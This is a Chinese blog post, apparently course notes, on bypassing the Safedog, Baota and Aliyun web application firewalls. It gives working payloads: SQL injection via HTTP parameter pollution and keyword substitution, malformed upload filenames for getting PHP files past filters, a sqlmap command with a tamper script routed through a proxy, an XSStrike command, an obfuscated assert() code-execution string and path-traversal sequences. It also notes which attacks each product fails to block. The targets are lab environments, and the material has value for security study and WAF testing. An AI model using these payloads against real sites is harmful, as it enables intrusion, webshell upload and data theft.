2-WAF主要过滤方式及绕过(HPP污染&分块传输&垃圾数据)

1、在漏洞发现中,WAF会对三个方向进行过滤拦截:

1、速度流量问题
2、工具的指纹被识别
3、工具的检测Poc或Payload

2、WAF攻防-漏洞利用HPP污染&分块传输&垃圾数据

1、SQL注入&文件上传绕过
2、XSS跨站&其他漏洞绕过
3、HPP污染&垃圾数据&分块等

安全狗-SQL注入&文件上传-知识点

SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html
关键字替换
http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 1
http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 12
更换提交方式:
POST id=-1 union select 1,2,3--+
模拟文件上传 传递数据
分块传输:更改数据请求格式
https://github.com/c0ny1/chunked-coding-converter
HPP参数污染:id=1/*&id=-1%20union%20select%201,2,3%23/

文件上传:换行解析&垃圾溢出&%00干扰&=符号干扰&参数模拟
filename=a.php
filename="a.php
filename="a.php%00"
垃圾数据;filename="a.php"
无限filename;filename="a.php"
filename=="a.php"
filename="name='uploadfile.php"
filename="Content-Disposition: form-data.php"
filename=="a.ph
p"

BT&Aliyun-SQL注入&文件上传-知识点

python sqlmap.py -u "http://test.xiaodi8.com/pikachu/vul/sqli/sqli_str.php?name=*&submit=%E6%9F%A5%E8%AF%A2" --random-agent --tamper=rdog.py --proxy="http://tps118.kdlapi.com:15818"
格式替换

BT&Aliyun-文件包含&代码执行-知识点

https://github.com/s0md3v/XSStrike
python xsstrike.py -u "http://test.xiaodi8.com/pikachu/vul/xss/xss_reflected_get.php?message=1&submit=submit" --proxy
txt=y=str_replace('x','','pxhpxinxfo()');assert(y);&submit=%E6%8F%90%E4%BA%A4
文件包含:没什么好说的就这几种
..\ ..../ ...\等

安全狗:
注入 xss 文件上传拦截
rce 文件包含 等其他不拦截

宝塔:
注入 上传拦截
rce 文件包含 xss等其他不拦截
其中拦截的是关键字

aliyun
拦截的CC速度 和 后门 信息收集和权限维持阶段拦截
漏洞利用 他不拦截 默认的版本(升级版本没测试)

WAF PHP环境 JAVA不支持

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 本文仅作学习记录,如有侵权,请联系删除!!! 前言: 冒个泡,证明自己还在,输出自己关于waf绕过的积累 SQL注...
    book4yi阅读 2,113评论 0 4
  • 一、SQL注入(注入) 1. 利用场景 从攻击者进行SQL注入的阶段来看,一般分为探测与攻击两个阶段(p.s.攻击...
    LizPL阅读 2,398评论 0 0
  • 本篇文章介绍如何从常规攻击的防御能力来评测一款WAF。一共覆盖了十六种攻击类型,每种类型均从利用场景(攻击操作的目...
    生活的探路者阅读 1,280评论 0 4
  • 近十年来,WAF 已经逐渐发展成熟,被软件行业接受并成为无数企业保护应用的不二选择。很多大型企业甚至相继亲自设计或...
    OneAPM阅读 1,015评论 0 1
  • waf简介: 网站WAF是一款服务器安全防护软件,是为IDC运营商、虚拟主机服务商、企业主机、服务器管理者等用户提...
    小银同学阿阅读 7,829评论 0 1